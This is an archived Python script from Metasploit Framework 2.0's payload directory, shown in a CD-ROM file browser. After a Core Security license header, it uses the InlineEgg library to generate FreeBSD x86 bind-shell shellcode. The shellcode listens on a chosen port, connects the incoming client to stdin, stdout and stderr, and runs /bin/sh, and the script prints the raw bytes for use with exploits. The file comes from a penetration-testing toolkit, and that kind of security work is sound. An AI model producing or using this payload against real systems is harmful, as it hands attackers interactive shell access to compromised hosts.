home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / external / bsdx86bind_ie.py next >
Text File  |  2006-06-30  |  3KB  |  84 lines

  1. #!/usr/bin/env python
  2. #--
  3. # Copyright (c) 2002,2003 Core Security Technologies, Core SDI Inc.
  4. # All rights reserved.
  5. #
  6. #    Unless you have express writen permission from the Copyright Holder, any
  7. # use of or distribution of this software or portions of it, including, but not
  8. # limited to, reimplementations, modifications and derived work of it, in
  9. # either source code or any other form, as well as any other software using or
  10. # referencing it in any way, may NOT be sold for commercial gain, must be
  11. # covered by this very same license, and must retain this copyright notice and
  12. # this license.
  13. #    Neither the name of the Copyright Holder nor the names of its contributors
  14. # may be used to endorse or promote products derived from this software
  15. # without specific prior written permission.
  16. #
  17. # THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
  18. # LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
  19. # OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
  20. # EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  21. # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE
  22. # ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU.
  23. # SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
  24. # SERVICING, REPAIR OR CORRECTION.
  25. #
  26. # IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
  27. # ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE
  28. # THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
  29. # GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE
  30. # OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR
  31. # DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR
  32. # A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH
  33. # HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
  34. #
  35. # gera [at corest.com]
  36. #--
  37.  
  38. ##
  39. # Modified to work as an external payload for Metasploit Framework 2.0
  40. ##
  41.  
  42. from inlineegg import *
  43. import socket
  44. import struct
  45. import sys
  46.  
  47. def Egg(opts):
  48.  
  49.     if not opts.has_key("LPORT"):
  50.         return
  51.  
  52.     listen_addr = "0.0.0.0"
  53.     listen_port = int(opts["LPORT"])
  54.  
  55.     egg = InlineEgg(FreeBSDx86Syscall)
  56.  
  57.     # connect to other side
  58.     sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
  59.     sock = egg.save(sock)
  60.     egg.bind(sock, (listen_addr, listen_port))
  61.     egg.listen(sock,1)
  62.  
  63.     client = egg.accept(sock, 0, 0)
  64.     client = egg.save(client)
  65.     egg.close(sock)
  66.  
  67.     egg.dup2(client, 0)
  68.     egg.dup2(client, 1)
  69.     egg.dup2(client, 2)
  70.     egg.execve('/bin/sh',('bash','-i'))
  71.     return egg
  72.  
  73. def main():
  74.      opts = {}
  75.      for o in sys.argv[1:]:
  76.          x = o.split("=")
  77.          if len(x) == 2:
  78.              opts[x[0]] = x[1]
  79.      egg = Egg(opts)
  80.      if egg != None:
  81.          sys.stdout.write(egg.getCode())
  82.          
  83. main()
  84.